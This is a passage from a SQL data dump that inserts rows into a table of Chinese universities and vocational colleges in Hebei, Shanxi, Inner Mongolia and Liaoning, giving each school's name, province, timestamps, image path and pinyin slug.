17:40:34','/images/school/default.png','qinhuangdaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(331,'唐山职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','tangshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(332,'衡水职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hengshuizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(333,'唐山工业职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','tangshangongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(334,'河北省艺术职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeishengyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(335,'河北交通职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(336,'河北化工医药职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeihuagongyiyaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(337,'石家庄信息工程职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangxinxigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(338,'保定电力职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baodingdianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(339,'河北机电职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeijidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(340,'渤海石油职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','bohaishiyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(341,'廊坊职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','langfangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(342,'唐山科技职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','tangshankejizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(343,'河北公安警察职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeigonganjingchazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(344,'石家庄工商职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuanggongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(345,'石家庄科技信息职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangkejixinxizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(346,'河北司法警官职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeisifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(347,'河北女子职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeinvzizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(348,'山西大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxidaxue',0,NULL,NULL,0,NULL,NULL),(349,'太原科技大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuankejidaxue',0,NULL,NULL,0,NULL,NULL),(350,'中北大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','zhongbeidaxue',0,NULL,NULL,0,NULL,NULL),(351,'太原理工大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuanligongdaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(352,'山西农业大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxinongyedaxue',0,NULL,NULL,0,NULL,NULL),(353,'山西医科大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiyikedaxue',0,NULL,NULL,0,NULL,NULL),(354,'山西师范大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxishifandaxue',0,NULL,NULL,0,NULL,NULL),(355,'山西大同大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxidatongdaxue',0,NULL,NULL,0,NULL,NULL),(356,'山西财经大学','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxicaijingdaxue',0,NULL,NULL,0,NULL,NULL),(357,'长治医学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changzhiyixueyuan',0,NULL,NULL,0,NULL,NULL),(358,'太原师范学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(359,'晋中学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jinzhongxueyuan',0,NULL,NULL,0,NULL,NULL),(360,'长治学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changzhixueyuan',0,NULL,NULL,0,NULL,NULL),(361,'运城学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yunchengxueyuan',0,NULL,NULL,0,NULL,NULL),(362,'忻州师范学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','xinzhoushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(363,'山西中医药大学','山西省','2014-04-23 00:00:00','2017-09-04 17:03:52','/images/school/default.png','shanxizhongyixueyuan',0,NULL,NULL,0,NULL,NULL),(364,'吕梁学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','lvliangxueyuan',0,NULL,NULL,0,NULL,NULL),(365,'太原学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuanxueyuan',0,NULL,NULL,0,NULL,NULL),(366,'山西工商学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxigongshangxueyuan',0,NULL,NULL,0,NULL,NULL),(367,'太原工业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuangongyexueyuan',0,NULL,NULL,0,NULL,NULL),(368,'山西传媒学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxichuanmeixueyuan',0,NULL,NULL,0,NULL,NULL),(369,'太原电力高等专科学校','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuandianligaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(370,'山西省财政税务专科学校','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxishengcaizhengshuiwuzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(371,'晋中师范高等专科学校','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jinzhongshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(372,'阳泉师范高等专科学校','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yangquanshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(373,'运城师范高等专科学校','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yunchengshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(374,'朔州师范高等专科学校','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shuozhoushifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(375,'山西警察学院','山西省','2014-04-23 00:00:00','2017-09-04 17:04:56','/images/school/default.png','shanxijingguangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(376,'运城幼儿师范高等专科学校','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yunchengyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(377,'山西药科职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiyaokezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(378,'大同煤炭职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','datongmeitanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(379,'山西职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(380,'山西同文职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxitongwenzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(381,'山西老区职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxilaoquzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(382,'山西经贸职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxijingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(383,'朔州职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shuozhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(384,'运城职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yunchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(385,'山西轻工职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(386,'山西青年职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiqingnianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(387,'运城护理职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yunchenghulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(388,'长治职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changzhizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(389,'山西艺术职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(390,'晋城职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jinchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(391,'山西建筑职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxijianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(392,'山西工程职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxigongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(393,'山西交通职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(394,'山西兴华职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxixinghuazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(395,'山西机电职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxijidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(396,'山西戏剧职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxixijuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(397,'山西财贸职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxicaimaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(398,'山西林业职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxilinyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(399,'山西水利职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxishuilizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(400,'阳泉职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yangquanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(401,'临汾职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','linfenzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(402,'山西煤炭职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanximeitanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(403,'山西金融职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxijinrongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(404,'太原城市职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuanchengshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(405,'山西信息职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(406,'山西体育职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxitiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(407,'山西警官职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxijingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(408,'山西国际商务职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiguojishangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(409,'潞安职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','luanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(410,'太原旅游职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','taiyuanlvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(411,'山西旅游职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxilvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(412,'山西管理职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(413,'山西电力职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxidianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(414,'忻州职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','xinzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(415,'晋中职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jinzhongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(416,'山西华澳商贸职业学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxihuaaoshangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(417,'山西运城农业职业技术学院','山西省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shanxiyunchengnongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(418,'内蒙古大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggudaxue',0,NULL,NULL,0,NULL,NULL),(419,'内蒙古科技大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggukejidaxue',0,NULL,NULL,0,NULL,NULL),(420,'内蒙古工业大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggugongyedaxue',0,NULL,NULL,0,NULL,NULL),(421,'内蒙古农业大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggunongyedaxue',0,NULL,NULL,0,NULL,NULL),(422,'内蒙古医科大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimengguyikedaxue',0,NULL,NULL,0,NULL,NULL),(423,'内蒙古师范大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggushifandaxue',0,NULL,NULL,0,NULL,NULL),(424,'内蒙古民族大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimengguminzudaxue',0,NULL,NULL,0,NULL,NULL),(425,'内蒙古财经大学','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggucaijingdaxue',0,NULL,NULL,0,NULL,NULL),(426,'赤峰学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','chifengxueyuan',0,NULL,NULL,0,NULL,NULL),(427,'呼伦贝尔学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hulunbeierxueyuan',0,NULL,NULL,0,NULL,NULL),(428,'集宁师范学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jiningshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(429,'河套学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hetaoxueyuan',0,NULL,NULL,0,NULL,NULL),(430,'呼和浩特民族学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','huhehaoteminzuxueyuan',0,NULL,NULL,0,NULL,NULL),(431,'乌兰察布医学高等专科学校','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','wulanchabuyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(432,'内蒙古民族幼儿师范高等专科学校','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimengguminzuyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(433,'内蒙古建筑职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggujianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(434,'内蒙古丰州职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggufengzhouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(435,'包头职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baotouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(436,'内蒙古科技职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(437,'内蒙古北方职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggubeifangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(438,'赤峰职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','chifengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(439,'内蒙古经贸外语职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggujingmaowaiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(440,'包头铁道职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baotoutiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(441,'鄂尔多斯职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','eerduosizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(442,'内蒙古工业职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggugongyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(443,'呼伦贝尔职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hulunbeierzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(444,'满洲里俄语职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','manzhoulieyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(445,'内蒙古能源职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggunengyuanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(446,'赤峰工业职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','chifenggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(447,'阿拉善职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','alashanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(448,'内蒙古美术职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggumeishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(449,'兴安职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','xinganzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(450,'呼和浩特职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','huhehaotezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(451,'包头轻工职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baotouqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(452,'内蒙古电子信息职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggudianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(453,'内蒙古机电职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggujidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(454,'内蒙古化工职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimengguhuagongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(455,'内蒙古商贸职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggushangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(456,'锡林郭勒职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','xilinguolezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(457,'内蒙古警察职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggujingchazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(458,'内蒙古体育职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggutiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(459,'乌兰察布职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','wulanchabuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(460,'通辽职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','tongliaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(461,'科尔沁艺术职业学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','keerqinyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(462,'内蒙古交通职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','neimenggujiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(463,'包头钢铁职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baotougangtiezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(464,'乌海职业技术学院','内蒙古自治区','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','wuhaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(465,'大连理工大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianligongdaxue',0,NULL,NULL,0,NULL,NULL),(466,'东北大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dongbeidaxue',0,NULL,NULL,0,NULL,NULL),(467,'大连海事大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianhaishidaxue',0,NULL,NULL,0,NULL,NULL),(468,'辽宁大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningdaxue',0,NULL,NULL,0,NULL,NULL),(469,'沈阳工业大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyanggongyedaxue',0,NULL,NULL,0,NULL,NULL),(470,'沈阳航空航天大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyanghangkonghangtiandaxue',0,NULL,NULL,0,NULL,NULL),(471,'沈阳理工大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangligongdaxue',0,NULL,NULL,0,NULL,NULL),(472,'辽宁科技大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningkejidaxue',0,NULL,NULL,0,NULL,NULL),(473,'辽宁工程技术大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoninggongchengjishudaxue',0,NULL,NULL,0,NULL,NULL),(474,'辽宁石油化工大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningshiyouhuagongdaxue',0,NULL,NULL,0,NULL,NULL),(475,'沈阳化工大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyanghuagongdaxue',0,NULL,NULL,0,NULL,NULL),(476,'大连交通大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianjiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(477,'大连工业大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','daliangongyedaxue',0,NULL,NULL,0,NULL,NULL),(478,'沈阳建筑大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangjianzhudaxue',0,NULL,NULL,0,NULL,NULL),(479,'辽宁工业大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoninggongyedaxue',0,NULL,NULL,0,NULL,NULL),(480,'沈阳农业大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangnongyedaxue',0,NULL,NULL,0,NULL,NULL),(481,'大连海洋大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianhaiyangdaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(482,'中国医科大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','zhongguoyikedaxue',0,NULL,NULL,0,NULL,NULL),(483,'大连医科大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianyikedaxue',0,NULL,NULL,0,NULL,NULL),(484,'辽宁中医药大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(485,'沈阳药科大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangyaokedaxue',0,NULL,NULL,0,NULL,NULL),(486,'辽宁师范大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningshifandaxue',0,NULL,NULL,0,NULL,NULL),(487,'沈阳师范大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangshifandaxue',0,NULL,NULL,0,NULL,NULL),(488,'渤海大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','bohaidaxue',0,NULL,NULL,0,NULL,NULL),(489,'大连外国语大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianwaiguoyudaxue',0,NULL,NULL,0,NULL,NULL),(490,'东北财经大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dongbeicaijingdaxue',0,NULL,NULL,0,NULL,NULL),(491,'沈阳大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangdaxue',0,NULL,NULL,0,NULL,NULL),(492,'大连大学','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','daliandaxue',0,NULL,NULL,0,NULL,NULL),(493,'大连民族大学','辽宁省','2014-04-23 00:00:00','2017-09-04 17:07:23','/images/school/default.png','dalianminzuxueyuan',0,NULL,NULL,0,NULL,NULL),(494,'中国刑事警察学院','辽宁省','2014-04-23 00:00:00','2015-10-16 